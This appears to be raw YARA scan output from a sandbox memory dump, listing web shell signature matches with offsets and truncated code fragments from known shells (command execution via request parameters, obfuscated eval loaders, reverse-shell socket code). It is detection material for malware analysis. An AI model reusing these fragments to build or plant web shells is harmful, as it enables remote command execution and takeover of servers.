- 0x22d6a:$s2: out.print(") <A Style='Color: " + fcolor.toString() + ";' HRef='?file=" + fn
- 0x22dbb:$s7: if(flist[i].canRead() == true) out.print("r" ); else out.print("-");
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHPJackal_v1_5 | Web Shell - file PHPJackal v1.5.php | Florian Roth | - 0x22ed4:$s7: echo "<center>${t}MySQL cilent:</td><td bgcolor=\"#333333\"></td></tr><form
- 0x22f24:$s8: echo "<center>${t}Wordlist generator:</td><td bgcolor=\"#333333\"></td></tr
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_customize | Web Shell - file customize.jsp | Florian Roth | - 0x1e035:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x2303a:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x251ee:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_s72_Shell_v1_1_Coding | Web Shell - file s72 Shell v1.1 Coding.php | Florian Roth | - 0x23168:$s5: <font face="Verdana" style="font-size: 8pt" color="#800080">Buradan Dosya
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_sys3 | Web Shell - file sys3.jsp | Florian Roth | - 0x1fcc0:$s1: <input type="submit" name="btnSubmit" value="Upload">
- 0x23277:$s1: <input type="submit" name="btnSubmit" value="Upload">
- 0x25304:$s1: <input type="submit" name="btnSubmit" value="Upload">
- 0x1bff3:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x1fc72:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x232b1:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x232ff:$s9: <%@page contentType="text/html;charset=gb2312"%>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_guige02 | Web Shell - file guige02.jsp | Florian Roth | - 0x233fa:$s0: ????????????????%><html><head><title>hahahaha</title></head><body bgcolor="#fff
- 0x2344e:$s1: <%@page contentType="text/html; charset=GBK" import="java.io.*;"%><%!private
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_ghost | Web Shell - file ghost.php | Florian Roth | - 0x23561:$s1: <?php $OOO000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'
- 0x235b6:$s6: //<img width=1 height=1 src="http://websafe.facaiok.com/just7z/sx.asp?u=***.***
- 0x2360a:$s7: preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(KmU("
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_WinX_Shell | Web Shell - file WinX Shell.php | Florian Roth | - 0x23706:$s5: print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">Filenam
- 0x2374d:$s8: print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">File: </
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Crystal_Crystal | Web Shell - file Crystal.php | Florian Roth | - 0x2385f:$s1: show opened ports</option></select><input type="hidden" name="cmd_txt" value
- 0x238b0:$s6: " href="?act=tools"><font color=#CC0000 size="3">Tools</font></a></span></f
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_r57_1_4_0 | Web Shell - file r57.1.4.0.php | Florian Roth | - 0x239c6:$s4: @ini_set('error_log',NULL);
- 0x31327:$s4: @ini_set('error_log',NULL);
- 0x239e6:$s6: $pass='abcdef1234567890abcdef1234567890';
- 0x312a4:$s6: $pass='abcdef1234567890abcdef1234567890';
- 0x23a14:$s7: @ini_restore("disable_functions");
- 0x23a3b:$s9: @ini_restore("safe_mode_exec_dir");
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_hsxa1 | Web Shell - file hsxa1.jsp | Florian Roth | - 0x1dee2:$s0: <%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="ja
- 0x23b25:$s0: <%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="ja
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_ajn | Web Shell - file ajn.asp | Florian Roth | - 0x23c33:$s1: seal.write "Set WshShell = CreateObject(""WScript.Shell"")" & vbcrlf
- 0x23c7c:$s6: seal.write "BinaryStream.SaveToFile ""c:\downloaded.zip"", adSaveCreateOve
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_cmd | Web Shell - file cmd.php | Florian Roth | - 0x23d89:$s0: if($_GET['cmd']) {
- 0x23da0:$s1: // cmd.php = Command Execution
- 0x23dc3:$s7: system($_GET['cmd']);
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_list | Web Shell - file list.asp | Florian Roth | - 0x23e9f:$s0: <INPUT TYPE="hidden" NAME="type" value="<%=tipo%>">
- 0x23ed7:$s4: Response.Write("<h3>FILE: " & file & "</h3>")
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHP_co | Web Shell - file co.php | Florian Roth | - 0x23fc5:$s0: cGX6R9q733WvRRjISKHOp9neT7wa6ZAD8uthmVJV
- 0x23ff3:$s11: 6Mk36lz/HOkFfoXX87MpPhZzBQH6OaYukNg1OE1j
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHP_150 | Web Shell - file 150.php | Florian Roth | - 0x240de:$s0: HJ3HjqxclkZfp
- 0x240f0:$s1: <? eval(gzinflate(base64_decode('
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_cmdjsp_2 | Web Shell - file cmdjsp.jsp | Florian Roth | - 0x241dc:$s0: Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
- 0x389f7:$s0: Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
- 0x21c73:$s4: <FORM METHOD=GET ACTION='cmdjsp.jsp'>
- 0x2421c:$s4: <FORM METHOD=GET ACTION='cmdjsp.jsp'>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHP_c37 | Web Shell - file c37.php | Florian Roth | - 0x24304:$s3: array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),
- 0x24342:$s9: ++$F; $File = urlencode($dir[$dirFILE]); $eXT = '.:'; if (strpos($dir[$dirFILE],
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHP_b37 | Web Shell - file b37.php | Florian Roth | - 0x24455:$s0: xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_backdoor | Web Shell - file php-backdoor.php | Florian Roth | - 0x24556:$s1: if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
- 0x245aa:$s2: <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input
- 0x3fe9e:$s2: <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_dabao | Web Shell - file dabao.asp | Florian Roth | - 0x246bf:$s2: Echo "<input type=button name=Submit onclick=""document.location ='" &
- 0x24710:$s8: Echo "document.Frm_Pack.FileName.value=""""+year+""-""+(month+1)+""-
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_2 | Web Shell - file 2.php | Florian Roth | - 0x24814:$s0: <?php assert($_REQUEST["c"]);?>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_cmdasp | Web Shell - file cmdasp.asp | Florian Roth | - 0x1c490:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x20c09:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x248fd:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x425d1:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x4c448:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x1c51b:$s7: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x24943:$s7: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x42548:$s7: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x4aa86:$s7: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x4c48e:$s7: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_spjspshell | Web Shell - file spjspshell.jsp | Florian Roth | - 0x24a56:$s7: Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\winnt\system32\cmd.exe /c type c:
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_action | Web Shell - file action.jsp | Florian Roth | - 0x24b6b:$s1: String url="jdbc:oracle:thin:@localhost:1521:orcl";
- 0x24ba3:$s6: <%@ page contentType="text/html;charset=gb2312"%>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Inderxer | Web Shell - file Inderxer.asp | Florian Roth | - 0x24c9d:$s4: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x3555a:$s4: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x4c686:$s4: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_Rader | Web Shell - file Rader.asp | Florian Roth | - 0x24db0:$s1: FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0
- 0x24e05:$s3: m" target=inf onClick="window.open('?action=help','inf','width=450,height=400
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_c99_madnet_smowu | Web Shell - file smowu.php | Florian Roth | - 0x24f21:$s0: //Authentication
- 0x40c1a:$s0: //Authentication
- 0x4236d:$s0: //Authentication
- 0x24f36:$s1: $login = "
- 0x42354:$s1: $login = "
- 0x240f3:$s2: eval(gzinflate(base64_decode('
- 0x24f45:$s2: eval(gzinflate(base64_decode('
- 0x312d2:$s2: eval(gzinflate(base64_decode('
- 0x3268d:$s2: eval(gzinflate(base64_decode('
- 0x40bb1:$s2: eval(gzinflate(base64_decode('
- 0x42319:$s2: eval(gzinflate(base64_decode('
- 0x24f68:$s4: //Pass
- 0x40be5:$s4: //Pass
- 0x42349:$s4: //Pass
- 0x24f73:$s5: $md5_pass = "
- 0x40b86:$s5: $md5_pass = "
- 0x422ee:$s5: $md5_pass = "
- 0x24f85:$s6: //If no pass then hash
- 0x40b96:$s6: //If no pass then hash
- 0x422fe:$s6: //If no pass then hash
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_moon | Web Shell - file moon.php | Florian Roth | - 0x25060:$s2: echo '<option value="create function backshell returns string soname
- 0x250a9:$s3: echo "<input name='p' type='text' size='27' value='".dirname(_FILE_)."
- 0x250f9:$s8: echo '<option value="select cmdshell(\'net user
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_jdbc | Web Shell - file jdbc.jsp | Florian Roth | - 0x1e035:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x2303a:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x251ee:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_minupload | Web Shell - file minupload.jsp | Florian Roth | - 0x1fcc0:$s0: <input type="submit" name="btnSubmit" value="Upload">
- 0x25304:$s0: <input type="submit" name="btnSubmit" value="Upload">
- 0x1bff3:$s9: String path=new String(request.getParameter("path").getBytes("ISO-8859
- 0x1fc72:$s9: String path=new String(request.getParameter("path").getBytes("ISO-8859
- 0x232b1:$s9: String path=new String(request.getParameter("path").getBytes("ISO-8859
- 0x25341:$s9: String path=new String(request.getParameter("path").getBytes("ISO-8859
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_ELMALISEKER_Backd00r | Web Shell - file ELMALISEKER Backd00r.asp | Florian Roth | - 0x25468:$s0: response.write("<tr><td bgcolor=#F8F8FF><input type=submit name=cmdtxtFileOptio
- 0x254bc:$s2: if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or req
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHP_bug_1_ | Web Shell - file bug (1).php | Florian Roth | - 0x255d0:$s0: @include($_GET['bug']);
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_caidao_shell_hkmjj | Web Shell - file hkmjj.asp | Florian Roth | - 0x256b7:$s6: codeds="Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li"
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_asd | Web Shell - file asd.jsp | Florian Roth | - 0x1dee2:$s3: <%@ page language="java" pageEncoding="gbk"%>
- 0x23b25:$s3: <%@ page language="java" pageEncoding="gbk"%>
- 0x257bc:$s3: <%@ page language="java" pageEncoding="gbk"%>
- 0x257ee:$s6: <input size="100" value="<%=application.getRealPath("/") %>" name="url
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_inback3 | Web Shell - file inback3.jsp | Florian Roth | - 0x21f89:$s0: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application
- 0x258ff:$s0: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_metaslsoft | Web Shell - file metaslsoft.php | Florian Roth | - 0x25a1a:$s7: $buff .= "<tr><td><a href=\"?d=".$pwd."\">[ $folder ]</a></td><td>LINK</t
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_Ajan | Web Shell - file Ajan.asp | Florian Roth | - 0x25b28:$s3: entrika.write "BinaryStream.SaveToFile ""c:\downloaded.zip"", adSaveCreate
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_config_myxx_zend | Web Shell - from files config.jsp, myxx.jsp, zend.jsp | Florian Roth | - 0x25cb5:$s3: .println("<a href=\"javascript:alert('You Are In File Now ! Can Not Pack !');
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_browser_201_3_ma_download | Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, download.jsp | Florian Roth | - 0x25eaf:$s2: <small>jsp File Browser version <%= VERSION_NR%> by <a
- 0x25eea:$s3: else if (fName.endsWith(".mpg") || fName.endsWith(".mpeg") || fName.endsWith
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_itsec_itsecteam_shell_jHn | Web Shell - from files itsec.php, itsecteam_shell.php, jHn.php | Florian Roth | - 0x2608b:$s4: echo $head."<font face='Tahoma' size='2'>Operating System : ".php_uname()."<b
- 0x260dd:$s5: echo "<center><form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_ghost_source_icesword_silic | Web Shell - from files ghost_source.php, icesword.php, silic.php | Florian Roth | - 0x26285:$s3: if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $
- 0x262da:$s6: if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST[
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_JspSpy_JspSpyJDK5_JspSpyJDK51_luci_jsp_spy2009_m_ma3_xxx | Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, t00ls.jsp, u.jsp, xia.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp | Florian Roth | - 0x26872:$s8: "<form action=\""+SHELL_NAME+"?o=upload\" method=\"POST\" enctype=
- 0x268b9:$s9: <option value='reg query \"HKLM\\System\\CurrentControlSet\\Control\\T
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_2_520_job_ma1_ma4_2 | Web Shell - from files 2.jsp, 520.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp | Florian Roth | - 0x26acc:$s4: _url = "jdbc:microsoft:sqlserver://" + dbServer + ":" + dbPort + ";User="
- 0x26b1b:$s9: result += "<meta http-equiv=\"refresh\" content=\"2;url=" + request.getR
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_000_403_807_a_c5_config_css_dm_he1p_JspSpy_JspSpyJDK5_JspSpyJDK51_luci_jsp_xxx | Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, config.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, myxx.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, t00ls.jsp, u.jsp, xia.jsp, zend.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp | Florian Roth | - 0x27139:$s0: ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500";
- 0x2717f:$s1: private static class VEditPropertyInvoker extends DefaultInvoker {
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_wso2_5_1_wso2_5_wso2 | Web Shell - from files wso2.5.1.php, wso2.5.php, wso2.php | Florian Roth | - 0x2730c:$s7: $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selec
- 0x2735f:$s8: .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['na
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_000_403_c5_queryDong_spyjsp2010_t00ls | Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp, t00ls.jsp | Florian Roth | - 0x2759a:$s8: table.append("<td nowrap> <a href=\"#\" onclick=\"view('"+tbName+"')
- 0x275e3:$s9: "<p><input type=\"hidden\" name=\"selectDb\" value=\""+selectDb+"
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_404_data_suiyue | Web Shell - from files 404.jsp, data.jsp, suiyue.jsp | Florian Roth | - 0x27765:$s3: sbCopy.append("<input type=button name=goback value=' "+strBack[languageNo]+
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_r57shell_r57shell127_SnIpEr_SA_Shell_EgY_SpIdEr_ShElL_V2_r57_xxx | Web Shell - from files r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, r57.php, Backdoor.PHP.Agent.php | Florian Roth | - 0x27a0a:$s2: echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name
- 0x27a5b:$s3: echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1
- 0x27aac:$s9: echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_807_a_css_dm_he1p_JspSpy_xxx | Web Shell - from files 807.jsp, a.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, nogfw.jsp, ok.jsp, style.jsp, u.jsp, xia.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp | Florian Roth | - 0x27f30:$s1: "<h2>Remote Control »</h2><input class=\"bt\" onclick=\"var
- 0x27f76:$s2: "<p>Current File (import new file name and new file)<br /><input class=\"inpu
- 0x27fc8:$s3: "<p>Current file (fullpath)<br /><input class=\"input\" name=\"file\" i
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_201_3_ma_download | Web Shell - from files 201.jsp, 3.jsp, ma.jsp, download.jsp | Florian Roth | - 0x28180:$s0: <input title="Upload selected file to the current working directory" type="Su
- 0x281d2:$s5: <input title="Launch command in current directory" type="Submit" class="but
- 0x28222:$s6: <input title="Delete all selected files and directories incl. subdirs" class=
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_browser_201_3_400_in_JFolder_jfolder01_jsp_leo_ma_warn_webshell_nc_download | Web Shell - from files browser.jsp, 201.jsp, 3.jsp, 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, ma.jsp, warn.jsp, webshell-nc.jsp, download.jsp | Florian Roth | - 0x2854a:$s4: UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
- 0x28587:$s5: long time = (System.currentTimeMillis() - starttime) / 1000l;
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_shell_phpspy_2006_arabicspy | Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php | Florian Roth | - 0x2871d:$s0: elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype
- 0x28772:$s8: echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"P
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_in_JFolder_jfolder01_jsp_leo_warn | Web Shell - from files in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp | Florian Roth | - 0x289a2:$s4: sbFile.append(" <a href=\"javascript:doForm('down','"+formatPath(strD
- 0x289f3:$s9: sbFile.append(" <a href=\"javascript:doForm('edit','"+formatPath(strDi
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_2_520_icesword_job_ma1_ma4_2 | Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp | Florian Roth | - 0x28c4a:$s2: private String[] _textFileTypes = {"txt", "htm", "html", "asp", "jsp",
- 0x28c95:$s3: \" name=\"upFile\" size=\"8\" class=\"textbox\" /> <input typ
- 0x28cdc:$s9: if (request.getParameter("password") == null && session.getAttribute("passwor
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_phpspy_2005_full_phpspy_2005_lite_PHPSPY | Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, PHPSPY.php | Florian Roth | - 0x28e9c:$s6: <input type="text" name="command" size="60" value="<?=$_POST['comma
- 0x4b5cc:$s6: <input type="text" name="command" size="60" value="<?=$_POST['comma
- 0x28ee4:$s7: echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],"".$uploaddir."/".$_FILE
- 0x28f35:$s8: <option value="passthru" <? if ($execfunc=="passthru") { echo "selected";
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_shell_phpspy_2006_arabicspy_hkrkoz | Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php, hkrkoz.php | Florian Roth | - 0x29112:$s5: $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname.
- 0x4506f:$s5: $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname.
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_c99_Shell_ci_Biz_was_here_c100_v_xxx | Web Shell - from files c99.php, Shell [ci | unknown | - 0x292ff:$s8: else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR"
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_2008_2009lite_2009mssql | Web Shell - from files 2008.php, 2009lite.php, 2009mssql.php | Florian Roth | - 0x29498:$s0: <a href="javascript:godir(\''.$drive->Path.'/\');
- 0x294ce:$s7: p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_shell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_arabicspy_PHPSPY_hkrkoz | Web Shell - from files shell.php, phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, arabicspy.php, PHPSPY.php, hkrkoz.php | Florian Roth | - 0x2970c:$s0: $mainpath_info = explode('/', $mainpath);
- 0x29744:$s6: if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "d
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_807_dm_JspSpyJDK5_m_cofigrue | Web Shell - from files 807.jsp, dm.jsp, JspSpyJDK5.jsp, m.jsp, cofigrue.jsp | Florian Roth | - 0x29946:$s1: url_con.setRequestProperty("REFERER", ""+fckal+"");
- 0x2997e:$s9: FileLocalUpload(uc(dx())+sxm,request.getRequestURL().toString(), "GBK");
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Dive_Shell_1_0_Emperor_Hacking_Team_xxx | Web Shell - from files Dive Shell 1.0 - Emperor Hacking Team.php, phpshell.php, SimShell 1.0 - Simorgh Security MGZ.php | Florian Roth | - 0x29af5:$s1: if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== fals
- 0x29b46:$s9: if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_404_data_in_JFolder_jfolder01_xxx | Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, suiyue.jsp, warn.jsp | Florian Roth | - 0x29d99:$s4: <TEXTAREA NAME="cqq" ROWS="20" COLS="100%"><%=sbCmd.toString()%></TE
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_reverse_jsp_reverse_jspbd | Web Shell - from files jsp-reverse.jsp, jsp-reverse.jsp, jspbd.jsp | Florian Roth | - 0x29f40:$s0: osw = new BufferedWriter(new OutputStreamWriter(os));
- 0x29f7a:$s7: sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
- 0x29fbe:$s9: isr = new BufferedReader(new InputStreamReader(is));
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_400_in_JFolder_jfolder01_jsp_leo_warn_webshell_nc | Web Shell - from files 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp, webshell-nc.jsp | Florian Roth | - 0x2a253:$s0: sbFolder.append("<tr><td > </td><td>");
- 0x2a284:$s1: return filesize / intDivisor + "." + strAfterComma + " " + strUnit;
- 0x2a2cc:$s5: FileInfo fi = (FileInfo) ht.get("cqqUploadFile");
- 0x2a302:$s6: <input type="hidden" name="cmd" value="<%=strCmd%>">
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_2_520_job_JspWebshell_1_2_ma1_ma4_2 | Web Shell - from files 2.jsp, 520.jsp, job.jsp, JspWebshell 1.2.jsp, ma1.jsp, ma4.jsp, 2.jsp | Florian Roth | - 0x2a54f:$s1: while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
- 0x2a58f:$s6: password = (String)session.getAttribute("password");
- 0x4105b:$s6: password = (String)session.getAttribute("password");
- 0x2a5c8:$s7: insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB231
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_gfs_sh_r57shell_r57shell127_SnIpEr_SA_xxx | Web Shell - from files gfs_sh.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, r57.php, Backdoor.PHP.Agent.php | Florian Roth | - 0x2ab50:$s0: kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI
- 0x3b73b:$s0: kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI
- 0x2aba6:$s11: Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KIC
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_itsec_PHPJackal_itsecteam_shell_jHn | Web Shell - from files itsec.php, PHPJackal.php, itsecteam_shell.php, jHn.php | Florian Roth | - 0x2ad8b:$s0: $link=pg_connect("host=$host dbname=$db user=$user password=$pass");
- 0x2add4:$s6: while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|
- 0x2ae29:$s9: while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+
|
